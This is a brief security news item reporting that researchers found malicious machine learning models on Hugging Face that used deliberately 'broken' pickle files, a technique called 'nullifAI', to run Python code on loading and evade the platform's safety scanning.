Researchers have identified malicious machine learning (ML) models on Hugging Face, leveraging a novel technique involving ‘broken’ pickle files to evade detection. This attack, dubbed ‘nullifAI’, abuses the Pickle file serialization process, allowing Python code execution during ML model deserialization. The malicious models were not initially flagged as unsafe by Hugging Face’s security mechanisms.